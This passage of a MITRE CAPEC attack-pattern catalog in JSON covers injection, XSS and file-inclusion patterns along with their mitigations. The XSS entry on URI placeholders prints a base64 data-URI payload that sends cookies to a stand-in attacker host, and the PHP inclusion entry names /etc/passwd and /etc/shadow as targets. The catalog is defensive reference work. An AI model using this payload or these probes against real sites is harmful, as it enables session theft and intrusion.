to prevent reverse engineering the standard libraries.","Assurance: Use static analysis tool to do code review and dynamic tool to do penetration test on the standard library.","Configuration: Get latest updates for the computer."]},"Example_Instances":{"Example":"Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \\"msits.exe\\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user\'s machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"693"}},"References":{"Reference":[{"External_Reference_ID":"REF-91"},{"External_Reference_ID":"REF-92","Section":"Exploit: Java/ByteVerify.C"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Name, Description, Execution_Flow, Prerequisites, Related_Attack_Patterns"}],"Previous_Entry_Name":["Calling Signed Code From Another Language Within A Sandbox Allow This",{"Date":"2018-07-31"},"Escaping a Sandbox by Calling Signed Code in Another Language",{"Date":"2020-12-17"}]}},"240":{"ID":"240","Name":"Resource Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Ensure all input content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all content.","Enforce regular patching of software."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"99"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Resource Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"242":{"ID":"242","Name":"Code Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target software does not validate user-controlled input such that the execution of a process may be altered by sending code in through legitimate data channels, using no other mechanism."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Code Injection attack patterns can result in a wide variety of consequences and negatively affect all three elements of the security triad."}},"Mitigations":{"Mitigation":["Utilize strict type, character, and encoding enforcement","Ensure all input content that is delivered to client is sanitized against an acceptable content specification.","Perform input validation for all content.","Enforce regular patching of software."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"94"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Code Injection"}},"References":{"Reference":{"External_Reference_ID":"REF-612","Section":"Testing for Code Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"243":{"ID":"243","Name":"XSS Targeting HTML Attributes","Abstraction":"Detailed","Status":"Draft","Description":"An adversary inserts commands to perform cross-site scripting (XSS) actions in HTML attributes. Many filters do not adequately sanitize attributes against the presence of potentially dangerous commands even if they adequately sanitize tags. For example, dangerous expressions could be inserted into a style attribute in an anchor tag, resulting in the execution of malicious code when the resulting page is rendered. If a victim is tricked into viewing the rendered page the attack proceeds like a normal XSS attack, possibly resulting in the loss of sensitive cookies or other malicious activities.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":"The target application must fail to adequately sanitize HTML attributes against the presence of dangerous commands."},"Resources_Required":{"Resource":"The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and use an allowlist for all input including that which is not expected to have any scripting content.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"83"}},"References":{"Reference":{"External_Reference_ID":"REF-94"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Cross-Site Scripting in Attributes",{"Date":"2017-05-01"},"XSS Targetting HTML Attributes",{"Date":"2018-07-31"}]}},"244":{"ID":"244","Name":"XSS Targeting URI Placeholders","Abstraction":"Detailed","Status":"Draft","Description":"An attack of this type exploits the ability of most browsers to interpret \\"data\\", \\"javascript\\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt injection payload variations on input parameters] Possibly using an automated tool, an attacker requests variations on the inputs they surveyed before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings using different URI schemes to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier to trace the injected string back to the entry point.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme."},"Skills_Required":{"Skill":["To inject the malicious payload in a web page",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Ability to send HTTP request to a web application"},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this."]},"Example_Instances":{"Example":{"p":["The following payload data:","represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.","The decoded payload is the following piece of HTML code:","Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.","An attacker could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):","Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack."],"div":["text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==",{"style":"margin-left:10px;","class":"informative"},"<html>",{"style":"margin-left:10px;","class":"informative","div":["<body>",{"style":"margin-left:10px;","div":["<script>",{"style":"margin-left:10px;","div":["var img = new Image();",{"style":"margin-left:10px;"}]}]}]},"<a href=\\"INJECTION_POINT\\">My Link</a>",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"83"}},"References":{"Reference":[{"External_Reference_ID":"REF-70","Section":"Testing for Cross site scripting"},{"External_Reference_ID":"REF-96"},{"External_Reference_ID":"REF-97","Section":"XSS Filter Evasion Cheat Sheet"},{"External_Reference_ID":"REF-72","Section":"WASC-08 - Cross Site Scripting"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Cross-Site Scripting via Encoded URI Schemes",{"Date":"2017-05-01"}]}},"245":{"ID":"245","Name":"XSS Using Doubled Characters","Abstraction":"Detailed","Status":"Draft","Description":"The attacker bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<<script or %3C%3script using URI encoding) the filters of some web applications may fail to recognize the presence of a script tag. If the targeted server is vulnerable to this type of bypass, the attacker can create a crafted URL or other trap to cause a victim to view a page on the targeted server where the malicious content is executed, as per a normal XSS attack.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":"The targeted web application does not fully normalize input before checking for prohibited syntax. In particular, it must fail to recognize prohibited methods preceded by certain sequences of repeated characters."},"Resources_Required":{"Resource":"The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and sanitize all user supplied fields.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"85"}},"References":{"Reference":{"External_Reference_ID":"REF-99"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},"Previous_Entry_Name":["Cross-Site Scripting Using Doubled Characters, e.g. %3C%3Cscript",{"Date":"2017-05-01"}]}},"247":{"ID":"247","Name":"XSS Using Invalid Characters","Abstraction":"Detailed","Status":"Draft","Description":"An adversary inserts invalid characters in identifiers to bypass application filtering of input. Filters may not scan beyond invalid characters but during later stages of processing content that follows these invalid characters may still be processed. This allows the attacker to sneak prohibited commands past filters and perform normally prohibited operations. Invalid characters may include null, carriage return, line feed or tab in an identifier. Successful bypassing of the filter can result in a XSS attack, resulting in the disclosure of web cookies or possibly other results.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"592"},{"Nature":"ChildOf","CAPEC_ID":"588"}]},"Prerequisites":{"Prerequisite":"The target must fail to remove invalid characters from input and fail to adequately scan beyond these characters."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Mitigations":{"Mitigation":["Design: Use libraries and templates that minimize unfiltered input.","Implementation: Normalize, filter and use an allowlist for any input that will be included in any subsequent web pages or back end operations.","Implementation: The victim should configure the browser to minimize active content from untrusted sources."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"86"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Cross-Site Scripting with Masking through Invalid Characters in Identifiers",{"Date":"2017-05-01"}]}},"248":{"ID":"248","Name":"Command Injection","Abstraction":"Meta","Status":"Stable","Description":"An adversary looking to execute a command of their choosing, injects new items into an existing command thus modifying interpretation away from what was intended. Commands in this context are often standalone strings that are interpreted by a downstream component and cause specific responses. This type of attack is possible when untrusted values are used to build these command strings. Weaknesses in input validation or command construction can enable the attack and lead to successful exploitation.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"The target application must accept input from the user and then use this input in the construction of commands to be executed. In virtually all cases, this is some form of string input that is concatenated to a constant string defined by the application to form the full command to be executed."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"A successful command injection attack enables an adversary to alter the command being executed and achieve a variety of negative consequences depending on the makeup of the new command. This includes potential information disclosure or the corruption of application data."}},"Mitigations":{"Mitigation":["All user-controllable input should be validated and filtered for potentially unwanted characters. Using an allowlist for input is desired, but if use of a denylist approach is necessary, then focusing on command related terms and delimiters is necessary.","Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.","Input should be parameterized, or restricted to data sections of a command, thus removing the chance that the input will be treated as part of the command itself."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"77"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Command Injection"}},"References":{"Reference":{"External_Reference_ID":"REF-615","Section":"Testing for Command Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Description Summary, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"}]}},"250":{"ID":"250","Name":"XML Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker utilizes crafted XML user-controllable input to probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information.","Likelihood_Of_Attack":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey Application]","Technique":["Spider web sites for all available links.","Gather results for analysis via responses or network sniffing."]},{"Step":"2","Phase":"Experiment","Description":"[Test user-controllable inputs for injection]","Technique":"Use XML reserved characters or words, possibly with other input data to attempt to cause unexpected results"}]},"Prerequisites":{"Prerequisite":["XML queries used to process user input and retrieve information stored in XML documents","User-controllable input not properly sanitized"]},"Skills_Required":{"Skill":["An attacker must have knowledge of XML syntax and constructs in order to successfully leverage XML Injection",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"Too many exceptions generated by the application as a result of malformed queries"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XML data or a query.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application."]},"Example_Instances":{"Example":"Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"91"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"23","Entry_Name":"XML Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"251":{"ID":"251","Name":"Local Code Inclusion","Abstraction":"Standard","Status":"Stable","Description":"The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"175"}},"Prerequisites":{"Prerequisite":["The targeted application must have a bug that allows an adversary to control which code file is loaded at some juncture.","Some variants of this attack may require that old versions of some code files be present and in predictable locations."]},"Resources_Required":{"Resource":"The adversary needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"Through local code inclusion, the adversary compromises the integrity of the application."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"An attacker may leverage local code inclusion in order to print sensitive data to a page, such as hidden configuration files or or password hashes."}]},"Mitigations":{"Mitigation":"Implementation: Avoid passing user input to filesystem or framework API. If necessary to do so, implement a specific, allowlist approach."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055","Entry_Name":"Process Injection"}},"References":{"Reference":{"External_Reference_ID":"REF-613","Section":"Testing for Local File Inclusion"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"}]}},"252":{"ID":"252","Name":"PHP Local File Inclusion","Abstraction":"Detailed","Status":"Draft","Description":"The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"251"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find. The adversary is looking for URLs that show PHP file inclusion is used, which can look something like \\"http://vulnerable-website/file.php?file=index.php\\".","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] Once the adversary finds a vulnerable URL that takes file input, they attempt a variety of path traversal techniques to attempt to get the application to display the contents of a local file, or execute a different PHP file already stored locally on the server.","Technique":["Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of path traversal techniques used to include well known files.","Use a proxy tool to record results of manual input of local file inclusion probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Include desired local file] Once the adversary has determined which techniques of path traversal successfully work with the vulnerable PHP application, they will target a specific local file to include. These can be files such as \\"/etc/passwd\\", \\"/etc/shadow\\", or configuration files for the application that might expose sensitive information."}]},"Prerequisites":{"Prerequisite":"The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture."},"Resources_Required":{"Resource":"The attacker needs to have enough access to the target application to control the identity of a locally included PHP file."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"References":{"Reference":{"External_Reference_ID":"REF-621","Section":"PHP File Inclusion"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"253":{"ID":"253","Name":"Remote Code Inclusion","Abstraction":"Standard","Status":"Draft","Description":"The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"175"},{"Nature":"CanPrecede","CAPEC_ID":"664"}]},"Prerequisites":{"Prerequisite":"Target application server must allow remote files to be included.The malicious file must be placed on the remote machine previously."},"Mitigations":{"Mitigation":"Minimize attacks by input validation and sanitization of any user data that will be used by the target application to locate a remote file to be included."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"05","Entry_Name":"Remote File Inclusion"}},"References":{"Reference":{"External_Reference_ID":"REF-614","Section":"Testing for Remote File Inclusion"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Weaknesses, 